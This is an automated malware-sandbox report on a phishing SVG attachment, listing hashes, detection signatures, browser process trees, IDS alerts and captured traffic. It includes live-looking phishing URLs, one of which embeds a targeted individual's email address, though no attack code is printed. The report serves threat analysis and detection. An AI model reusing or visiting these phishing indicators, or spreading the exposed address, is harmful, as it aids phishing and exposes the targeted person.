
Windows Analysis Report
SecureMessageatt.svg

Overview

General Information

Sample name:SecureMessageatt.svg
Analysis ID:1635687
MD5:f95865d146dfa390b355d84b7a64273a
SHA1:47f92e698ce0719378d554b290c0c435f4ebcb3d
SHA256:c0e499456fb4736c459254db42dafee1f67c3906453652872eac62918785007b

Detection

Phisher
Score:60
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected Phisher
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 7788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\SecureMessageatt.svg" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,17368269902574151538,11146728938556299558,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1856 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 2344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2012,i,17368269902574151538,11146728938556299558,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=6032 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
Yara match: Source: SecureMessageatt.svg | Rule: JoeSecurity_Phisher_2 | Description: Yara detected Phisher | Author: Joe Security | Strings: (none shown)
    No Sigma rule has matched
    Suricata alert: Timestamp: 2025-03-11T22:18:51.082329+0100 | SID: 2803274 | Severity: 2 | Classtype: Potentially Bad Traffic | Source IP: 192.168.2.4 | Source Port: 49711 | Destination IP: 104.26.12.205 | Destination Port: 443 | Protocol: TCP

    AV Detection

    Source: https://coxmotec.com/wp-includes/js/emFjaGFyeS5hZGtpbnNAcnJjLnRleGFzLmdvdg== | Avira URL Cloud: Label: phishing

    Phishing

    Source: Yara match | File source: SecureMessageatt.svg, type: SAMPLE
    Source: 1.1..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://coxmotec.com/wp-includes/js/emFjaGFyeS5hZG... The script demonstrates high-risk behavior by redirecting the user to an untrusted domain, which is a common technique used in phishing attacks to steal sensitive information like user credentials.
    Source: 1.13.d.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: ... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script that collects user data and potentially redirects to a suspicious domain. The script also attempts to hide its true purpose through heavy obfuscation, which is a common tactic used in malware. Overall, this script demonstrates a high level of risk and should be treated with caution.
    Source: 1.97.d.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: ... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It appears to be a malicious script designed to collect sensitive user information and potentially execute further malicious actions.
    Source: file:///C:/Users/user/Desktop/SecureMessageatt.svg | HTTP Parser: No favicon
    Source: https://0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev/?qrc=zachary.adkins@rrc.texas.gov | HTTP Parser: No favicon
    Source: unknown | HTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: Joe Sandbox View | IP Address: 104.18.94.41
    Source: Joe Sandbox View | IP Address: 104.18.95.41
    Source: Joe Sandbox View | IP Address: 104.21.80.1
    Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49711 -> 104.26.12.205:443
    Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknown | TCP traffic detected without corresponding DNS query: 52.113.196.254
    Source: unknown | TCP traffic detected without corresponding DNS query: 131.253.33.254
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxContent-Type: application/pkix-certLast-Modified: Wed, 01 May 2024 21:14:13 GMTETag: "6632b0a5-509"Content-Disposition: attachment; filename="R10.der"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1245Cache-Control: max-age=3600Expires: Tue, 11 Mar 2025 22:20:53 GMTDate: Tue, 11 Mar 2025 21:20:53 GMTConnection: keep-aliveData Raw: 1f 8b 08 00 00 00 00 00 00 00 33 68 62 65 35 68 62 7a bb 80 99 89 91 89 49 c0 7b 45 d0 e4 ef b3 f4 17 15 b3 79 af 60 e9 2d bd 60 c0 cb c6 a9 d5 e6 d1 f6 9d 97 91 91 9b 95 c1 c0 df 90 db 80 93 8d 39 94 85 4d 98 29 34 d8 50 d3 40 1d c4 e1 12 56 f0 cc 2b 49 2d ca 4b 2d 51 08 4e 4d 2e 2d ca 2c a9 54 08 4a 2d 4e 4d 2c 4a ce 50 70 2f ca 2f 2d 30 14 35 10 06 29 65 16 e6 f1 0c 0e 72 57 08 ca cf 2f 51 88 30 34 90 13 e7 35 32 31 30 36 34 36 00 83 28 20 d7 1c c8 35 32 32 36 b5 34 b5 8c 02 32 51 2c 14 33 10 81 58 c8 eb 93 5a a2 5e ac e0 9a 97 5c 54 59 50 62 c8 63 c0 05 31 9d 39 c8 d0 c0 a0 89 51 09 d9 e1 8c ac 0c cc 4d 8c fc 0c 40 71 2e a6 26 46 46 86 f3 e1 4f 9f 1d 09 11 7a bb c5 fd df 49 f5 88 32 b7 00 8d 1e 59 bb 8e fb ac 73 af 6e 95 d0 dc 7b 77 6b d4 fe 5f df ce 2d de b7 9e 41 d1 3b 29 2a ca 86 51 ff 68 04 f3 b7 ce ff 7d 82 ce af 0f 6e 7d 20 c2 3e ad 3f 5f fe fa f3 5d 8d 96 9c a5 a9 db 0f ad 97 88 36 57 d3 78 be f8 0b bb 76 ae d4 ff d5 11 7b a6 ae 73 f8 ff f2 74 f8 91 ad d1 f5 15 bc 12 89 7b c4 9f 87 1c db ed 39 f1 6c 9e c4 c5 86 d6 77 cb 52 cd f6 94 bc da 13 e0 f3 ea 8f e2 67 0b b1 c9 53 76 6d b8 9c 6d c1 76 56 4c a8 ea 54 50 e9 89 b5 65 9b 0e cd 89 9d e1 1a 93 9f 58 7d 4c f7 9d 8d 70 50 1b e3 cd f0 67 16 32 f7 7b b7 ca 4f 9a 38 eb b9 97 cc 19 d7 15 45 a1 1f 36 3c 5b cc fe e6 ef 72 e9 b4 79 f6 1e dd 85 2d 85 11 27 ad 7e bd 8f fb 14 ed a2 6d 53 f2 bc 7f 93 fb 41 f6 ac b3 b3 b6 f3 4e fb 2e d4 a8 16 18 c2 f5 26 f1 db f7 af 8f 3e 75 9d 98 ca db cb c4 cc c8 c0 b8 b8 f1 87 41 e3 57 03 3e 60 b8 c9 f2 33 32 fe 67 61 01 26 81 36 03 59 10 5f 95 05 
14 d0 1c da 6c 8c ac ac ec cc 4c 70 16 a3 81 10 48 5a 18 a4 9c c3 80 0d 48 31 31 32 40 b4 f0 b1 88 b1 88 ec de 73 d8 7d e9 93 3d 2b 8f 1d 5e 52 c4 23 d0 bb c8 f4 e1 89 17 06 f2 20 69 65 16 09 03 b1 06 91 ca 2d 91 cf aa b7 3d 7d c2 58 dc c0 d1 71 42 2a e2 db cb d9 79 06 46 30 f3 19 19 59 d4 0c 54 0c 94 60 7c 03 a6 36 b1 8c 92 92 02 2b 7d fd 0a 43 bd 4c bd 9c 54 60 74 eb e5 17 a5 eb 83 13 93 ac 02 0b 30 de 0d 38 d8 d8 d2 1b 79 18 99 18 c1 89 51 56 9e 45 c1 40 ce 40 66 81 d4 02 09 64 dd c9 c8 ba 51 53 35 73 13 d0 17 93 36 3e 77 34 7f 5d 39 b7 f1 d9 d9 47 aa 0f ad 14 5e 4e 70 99 ba b8 31 e6 fc e1 d8 bf 7b 17 14 5c dd 38 4d 43 89 fb d2 27 8d f3 3c cf af 3c 73 ee 51 51 92 3d e8 34 e9 22 e7 fa f9 de 5f 4e 14 f8 2b 88 6d 8c ba cb f8 4d fe 87 7c 62 b6 88 fa 86 a2 de e4 75 ef 1e 9d f3 3e 6f 7e 77 f7 e2 2b 67 9f af 0d 58 bb 77 ff e3 37 76 49 66 05 33 0d 97 bf e8 bd fb 2a e9 91 d0 ba af 73 ae d8 ea f0 ac ba 30 Data Ascii: 3hbe5hbzI{Ey`-`9M)4P@V+I-K-QNM.-
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: AutoIt | Host: api.ipify.org | Cache-Control: no-cache
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: AutoIt | Host: api.ipify.org
    Source: global traffic | HTTP traffic detected: GET /api/json/ip/5SPfwvEV3gwc55pvxBQOnjhEt01fgi0C/64.64.116.7 HTTP/1.1 | User-Agent: AutoIt | Host: ipqualityscore.com | Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /wp-includes/js/emFjaGFyeS5hZGtpbnNAcnJjLnRleGFzLmdvdg== HTTP/1.1Host: coxmotec.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91ee16efd9062312&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1075193866:1741724010:kuXYnhnAAlMhdzcb7_7tQu4pX_CF0pQtqSA0WUvAonE/91ee16efd9062312/zWD85ZnN2ecjeqSqewopDBTFcr5UksGAau3F96XuUxQ-1741727961-1.1.1.1-30oOVfYIhBtWXgMHzJ0eUotjeAszGWH49zvp6iX0C22eBFI7NWAZhToyvfuRF1I0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91ee16efd9062312/1741727967275/Hy7jn623z7dvMWW HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91ee16efd9062312/1741727967275/Hy7jn623z7dvMWW HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/91ee16efd9062312/1741727967282/97f74a26ba1df846f6db44673f65a92e55591ba758862141c65a2a81484c6ffa/o483X2mSdMhBgPM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1075193866:1741724010:kuXYnhnAAlMhdzcb7_7tQu4pX_CF0pQtqSA0WUvAonE/91ee16efd9062312/zWD85ZnN2ecjeqSqewopDBTFcr5UksGAau3F96XuUxQ-1741727961-1.1.1.1-30oOVfYIhBtWXgMHzJ0eUotjeAszGWH49zvp6iX0C22eBFI7NWAZhToyvfuRF1I0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1075193866:1741724010:kuXYnhnAAlMhdzcb7_7tQu4pX_CF0pQtqSA0WUvAonE/91ee16efd9062312/zWD85ZnN2ecjeqSqewopDBTFcr5UksGAau3F96XuUxQ-1741727961-1.1.1.1-30oOVfYIhBtWXgMHzJ0eUotjeAszGWH49zvp6iX0C22eBFI7NWAZhToyvfuRF1I0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcvqOjEmIVqWNxyChPWuRyuSVgJ1.f3Z8MaZncvnSwIEGM-1741727961-1.3.1.1-g1KhQm9d10ChdcEBm7KC56wvSLLpGEJz7_up0Mc0s2k/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/failure_retry/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91ee181ead84c325&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcvqOjEmIVqWNxyChPWuRyuSVgJ1.f3Z8MaZncvnSwIEGM-1741727961-1.3.1.1-g1KhQm9d10ChdcEBm7KC56wvSLLpGEJz7_up0Mc0s2k/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/failure_retry/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1328512358:1741724051:vf1wI2YD3_-ZdiO3ZmTkutZy2y0blo3rBlvEFk-0m3g/91ee181ead84c325/Xw32iByo_ezluBxHyRXc0QK7bjck2tPSI_mAE8VhREk-1741728010-1.1.1.1-w6NOyNk8aX1JiR9HaL66PXzHjq7iF8zqVbJjWUwREc2bLYIYz1C9DYWTNGibcoJd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/91ee181ead84c325/1741728016086/61f3f0d669fc0bc17cb7802234e7bad3471c18a83b55f1b6d8ed3a743ebdae20/F1StGA_mYnnvtZ4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcvqOjEmIVqWNxyChPWuRyuSVgJ1.f3Z8MaZncvnSwIEGM-1741727961-1.3.1.1-g1KhQm9d10ChdcEBm7KC56wvSLLpGEJz7_up0Mc0s2k/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/failure_retry/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91ee181ead84c325/1741728016090/AsWFfXZs9BwJng8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcvqOjEmIVqWNxyChPWuRyuSVgJ1.f3Z8MaZncvnSwIEGM-1741727961-1.3.1.1-g1KhQm9d10ChdcEBm7KC56wvSLLpGEJz7_up0Mc0s2k/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/failure_retry/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91ee181ead84c325/1741728016090/AsWFfXZs9BwJng8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1328512358:1741724051:vf1wI2YD3_-ZdiO3ZmTkutZy2y0blo3rBlvEFk-0m3g/91ee181ead84c325/Xw32iByo_ezluBxHyRXc0QK7bjck2tPSI_mAE8VhREk-1741728010-1.1.1.1-w6NOyNk8aX1JiR9HaL66PXzHjq7iF8zqVbJjWUwREc2bLYIYz1C9DYWTNGibcoJd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1328512358:1741724051:vf1wI2YD3_-ZdiO3ZmTkutZy2y0blo3rBlvEFk-0m3g/91ee181ead84c325/Xw32iByo_ezluBxHyRXc0QK7bjck2tPSI_mAE8VhREk-1741728010-1.1.1.1-w6NOyNk8aX1JiR9HaL66PXzHjq7iF8zqVbJjWUwREc2bLYIYz1C9DYWTNGibcoJd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: r10.i.lencr.org | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9
    Source: global traffic | DNS traffic detected: DNS query: coxmotec.com
    Source: global traffic | DNS traffic detected: DNS query: www.google.com
    Source: global traffic | DNS traffic detected: DNS query: 0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev
    Source: global traffic | DNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global traffic | DNS traffic detected: DNS query: filsinsadoscan.one
    Source: global traffic | DNS traffic detected: DNS query: r10.i.lencr.org
